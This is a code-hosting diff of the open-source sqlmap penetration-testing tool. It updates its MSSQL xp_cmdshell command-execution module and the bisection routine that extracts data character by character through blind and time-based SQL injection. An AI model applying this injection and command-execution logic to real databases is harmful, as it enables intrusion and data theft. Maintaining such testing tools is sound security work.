||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
from lib.core.agent import agent
|
from lib.core.agent import agent
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
|
from lib.core.common import flattenValue
|
||||||
from lib.core.common import getLimitRange
|
from lib.core.common import getLimitRange
|
||||||
from lib.core.common import getSQLSnippet
|
from lib.core.common import getSQLSnippet
|
||||||
from lib.core.common import hashDBWrite
|
from lib.core.common import hashDBWrite
|
||||||
|
@ -51,10 +52,9 @@ class Xp_cmdshell:
|
||||||
inject.goStacked(agent.runAsDBMSUser(cmd))
|
inject.goStacked(agent.runAsDBMSUser(cmd))
|
||||||
|
|
||||||
self._randStr = randomStr(lowercase=True)
|
self._randStr = randomStr(lowercase=True)
|
||||||
self._xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
|
self.xpCmdshellStr = "master..new_xp_cmdshell"
|
||||||
self.xpCmdshellStr = "master..%s" % self._xpCmdshellNew
|
|
||||||
|
|
||||||
cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr, XP_CMDSHELL_NEW=self._xpCmdshellNew)
|
cmd = getSQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self._randStr)
|
||||||
|
|
||||||
if Backend.isVersionWithin(("2005", "2008")):
|
if Backend.isVersionWithin(("2005", "2008")):
|
||||||
cmd += ";RECONFIGURE WITH OVERRIDE"
|
cmd += ";RECONFIGURE WITH OVERRIDE"
|
||||||
|
@ -142,13 +142,13 @@ class Xp_cmdshell:
|
||||||
charCounter += len(echoedLine)
|
charCounter += len(echoedLine)
|
||||||
|
|
||||||
if charCounter >= maxLen:
|
if charCounter >= maxLen:
|
||||||
self.xpCmdshellExecCmd(cmd)
|
self.xpCmdshellExecCmd(cmd.rstrip(" & "))
|
||||||
|
|
||||||
cmd = ""
|
cmd = ""
|
||||||
charCounter = 0
|
charCounter = 0
|
||||||
|
|
||||||
if cmd:
|
if cmd:
|
||||||
self.xpCmdshellExecCmd(cmd)
|
self.xpCmdshellExecCmd(cmd.rstrip(" & "))
|
||||||
|
|
||||||
def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
|
def xpCmdshellForgeCmd(self, cmd, insertIntoTable=None):
|
||||||
# When user provides DBMS credentials (with --dbms-cred) we need to
|
# When user provides DBMS credentials (with --dbms-cred) we need to
|
||||||
|
@ -226,12 +226,16 @@ class Xp_cmdshell:
|
||||||
inject.goStacked("DELETE FROM %s" % self.cmdTblName)
|
inject.goStacked("DELETE FROM %s" % self.cmdTblName)
|
||||||
|
|
||||||
if output and isListLike(output) and len(output) > 1:
|
if output and isListLike(output) and len(output) > 1:
|
||||||
if not (output[0] or "").strip():
|
_ = ""
|
||||||
output = output[1:]
|
lines = [line for line in flattenValue(output) if line is not None]
|
||||||
elif not (output[-1] or "").strip():
|
|
||||||
output = output[:-1]
|
|
||||||
|
|
||||||
output = "\n".join(line for line in filter(None, output))
|
for i in xrange(len(lines)):
|
||||||
|
line = lines[i] or ""
|
||||||
|
if line is None or i in (0, len(lines) - 1) and not line.strip():
|
||||||
|
continue
|
||||||
|
_ += "%s\n" % line
|
||||||
|
|
||||||
|
output = _.rstrip('\n')
|
||||||
|
|
||||||
return output
|
return output
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -40,6 +40,7 @@ from lib.core.settings import INFERENCE_UNKNOWN_CHAR
|
||||||
from lib.core.settings import INFERENCE_GREATER_CHAR
|
from lib.core.settings import INFERENCE_GREATER_CHAR
|
||||||
from lib.core.settings import INFERENCE_EQUALS_CHAR
|
from lib.core.settings import INFERENCE_EQUALS_CHAR
|
||||||
from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR
|
from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR
|
||||||
|
from lib.core.settings import MAX_BISECTION_LENGTH
|
||||||
from lib.core.settings import MAX_TIME_REVALIDATION_STEPS
|
from lib.core.settings import MAX_TIME_REVALIDATION_STEPS
|
||||||
from lib.core.settings import PARTIAL_HEX_VALUE_MARKER
|
from lib.core.settings import PARTIAL_HEX_VALUE_MARKER
|
||||||
from lib.core.settings import PARTIAL_VALUE_MARKER
|
from lib.core.settings import PARTIAL_VALUE_MARKER
|
||||||
|
@ -58,6 +59,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||||
"""
|
"""
|
||||||
|
|
||||||
abortedFlag = False
|
abortedFlag = False
|
||||||
|
showEta = False
|
||||||
partialValue = u""
|
partialValue = u""
|
||||||
finalValue = None
|
finalValue = None
|
||||||
retrievedLength = 0
|
retrievedLength = 0
|
||||||
|
@ -135,6 +137,9 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||||
if length and (lastChar > 0 or firstChar > 0):
|
if length and (lastChar > 0 or firstChar > 0):
|
||||||
length = min(length, lastChar or length) - firstChar
|
length = min(length, lastChar or length) - firstChar
|
||||||
|
|
||||||
|
if length and length > MAX_BISECTION_LENGTH:
|
||||||
|
length = None
|
||||||
|
|
||||||
showEta = conf.eta and isinstance(length, int)
|
showEta = conf.eta and isinstance(length, int)
|
||||||
numThreads = min(conf.threads, length)
|
numThreads = min(conf.threads, length)
|
||||||
|
|
||||||
|
@ -194,7 +199,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||||
value are not equal there will be a deliberate delay).
|
value are not equal there will be a deliberate delay).
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if CHAR_INFERENCE_MARK not in payload:
|
if "'%s'" % CHAR_INFERENCE_MARK not in payload:
|
||||||
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx, value))
|
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_NOT_EQUALS_CHAR), (expressionUnescaped, idx, value))
|
||||||
else:
|
else:
|
||||||
# e.g.: ... > '%c' -> ... > ORD(..)
|
# e.g.: ... > '%c' -> ... > ORD(..)
|
||||||
|
@ -221,7 +226,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||||
if charTbl is None:
|
if charTbl is None:
|
||||||
charTbl = type(asciiTbl)(asciiTbl)
|
charTbl = type(asciiTbl)(asciiTbl)
|
||||||
|
|
||||||
originalTbl = type(asciiTbl)(charTbl)
|
originalTbl = type(charTbl)(charTbl)
|
||||||
|
|
||||||
if continuousOrder and shiftTable is None:
|
if continuousOrder and shiftTable is None:
|
||||||
# Used for gradual expanding into unicode charspace
|
# Used for gradual expanding into unicode charspace
|
||||||
|
@ -250,7 +255,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||||
position = (len(charTbl) >> 1)
|
position = (len(charTbl) >> 1)
|
||||||
posValue = charTbl[position]
|
posValue = charTbl[position]
|
||||||
|
|
||||||
if CHAR_INFERENCE_MARK not in payload:
|
if "'%s'" % CHAR_INFERENCE_MARK not in payload:
|
||||||
forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
|
forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
|
||||||
else:
|
else:
|
||||||
# e.g.: ... > '%c' -> ... > ORD(..)
|
# e.g.: ... > '%c' -> ... > ORD(..)
|
||||||
|
@ -309,10 +314,10 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||||
errMsg = "invalid character detected. retrying.."
|
errMsg = "invalid character detected. retrying.."
|
||||||
logger.error(errMsg)
|
logger.error(errMsg)
|
||||||
|
|
||||||
conf.timeSec += 1
|
if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE:
|
||||||
|
conf.timeSec += 1
|
||||||
warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '')
|
warnMsg = "increasing time delay to %d second%s " % (conf.timeSec, 's' if conf.timeSec > 1 else '')
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES:
|
if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES:
|
||||||
dbgMsg = "turning off time auto-adjustment mechanism"
|
dbgMsg = "turning off time auto-adjustment mechanism"
|
||||||
|
@ -340,10 +345,13 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||||
if minValue == maxChar or maxValue == minChar:
|
if minValue == maxChar or maxValue == minChar:
|
||||||
return None
|
return None
|
||||||
|
|
||||||
# If we are working with non-continuous elements, set
|
for index in xrange(len(originalTbl)):
|
||||||
# both minValue and character afterwards are possible
|
if originalTbl[index] == minValue:
|
||||||
# candidates
|
break
|
||||||
for retVal in (originalTbl[originalTbl.index(minValue)], originalTbl[originalTbl.index(minValue) + 1]):
|
|
||||||
|
# If we are working with non-continuous elements, both minValue and character after
|
||||||
|
# are possible candidates
|
||||||
|
for retVal in (originalTbl[index], originalTbl[index + 1]):
|
||||||
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, retVal))
|
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, retVal))
|
||||||
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
|
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
|
||||||
incrementCounter(kb.technique)
|
incrementCounter(kb.technique)
|
||||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user